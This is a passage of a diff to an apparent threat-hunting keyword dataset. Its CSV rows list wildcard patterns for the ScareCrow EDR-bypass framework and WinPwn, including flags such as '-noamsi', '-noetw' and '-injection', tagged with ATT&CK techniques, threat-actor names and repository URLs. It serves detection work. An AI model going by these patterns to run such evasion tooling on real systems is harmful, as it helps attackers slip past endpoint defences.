- Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","1","N/A","10","10","2580","458","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" -"*ScareCrow/Loader*","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","1","N/A","10","10","2580","458","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" -"*ScareCrow/Utils*","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - 
T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","1","N/A","10","10","2580","458","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" -"*ScareCrow_*_darwin_amd64*","offensive_tool_keyword","ScareCrow","ScareCrow - Payload creation framework designed around EDR bypass.","T1548 - T1562 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/ScareCrow","1","1","N/A","N/A","10","2580","458","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" -"*ScareCrow_*_linux_amd64*","offensive_tool_keyword","ScareCrow","ScareCrow - Payload creation framework designed around EDR bypass.","T1548 - T1562 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/ScareCrow","1","1","N/A","N/A","10","2580","458","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" -"*ScareCrow_*amd64*","offensive_tool_keyword","ScareCrow","ScareCrow - Payload creation framework designed around EDR bypass.","T1548 - T1562 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/ScareCrow","1","1","N/A","N/A","10","2580","458","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" -"*ScareCrow_checksums.txt*","offensive_tool_keyword","ScareCrow","ScareCrow - Payload creation framework designed around EDR bypass.","T1548 - T1562 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","Defense 
Evasion","https://github.com/optiv/ScareCrow","1","1","N/A","N/A","10","2580","458","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" -"*SCCM_DLLSiteloading.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*ScareCrow *-loader *","offensive_tool_keyword","ScareCrow","ScareCrow - Payload creation framework designed around EDR bypass.","T1548 - T1562 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/ScareCrow","1","0","N/A","N/A","10","2581","459","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" +"*ScareCrow* -encryptionmode *","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/optiv/ScareCrow","1","0","N/A","10","10","2581","459","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" +"*ScareCrow* -Evasion*","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","0","N/A","10","10","2581","459","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" +"*ScareCrow* -Exec*","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - 
T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","0","N/A","10","10","2581","459","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" +"*ScareCrow* -injection*","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","0","N/A","10","10","2581","459","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" +"*ScareCrow* -Loader * ","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 
- T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","0","N/A","10","10","2581","459","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" +"*ScareCrow* -noamsi*","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group 
- APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","0","N/A","10","10","2581","459","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" +"*ScareCrow* -noetw*","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","0","N/A","10","10","2581","459","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" +"*ScareCrow* -obfu*","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 
- T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","0","N/A","10","10","2581","459","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" +"*ScareCrow*_darwin_amd64*","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/optiv/ScareCrow","1","1","N/A","10","10","2581","459","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" +"*ScareCrow*_windows_amd64.exe*","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","1","N/A","10","10","2581","459","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" +"*ScareCrow*KnownDLL*","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - 
T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","1","N/A","10","10","2581","459","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" +"*ScareCrow*ProcessInjection*","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","1","N/A","10","10","2581","459","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" +"*ScareCrow*windows_amd64.exe*","offensive_tool_keyword","ScareCrow","ScareCrow - Payload creation framework designed around EDR 
bypass.","T1548 - T1562 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/ScareCrow","1","1","N/A","N/A","10","2581","459","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" +"*ScareCrow.cna*","offensive_tool_keyword","cobaltstrike","Cobalt Strike script for ScareCrow payloads intergration (EDR/AV evasion)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/GeorgePatsias/ScareCrow-CobaltStrike","1","1","N/A","10","10","438","68","2022-07-15T09:39:18Z","2021-06-24T10:04:01Z" +"*ScareCrow.go*","offensive_tool_keyword","ScareCrow","ScareCrow - Payload creation framework designed around EDR bypass.","T1548 - T1562 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/ScareCrow","1","1","N/A","N/A","10","2581","459","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" +"*ScareCrow/Cryptor*","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 
- T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","1","N/A","10","10","2581","459","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" +"*ScareCrow/limelighter*","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca 
- Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","1","N/A","10","10","2581","459","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" +"*ScareCrow/Loader*","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","1","N/A","10","10","2581","459","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" +"*ScareCrow/Utils*","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - 
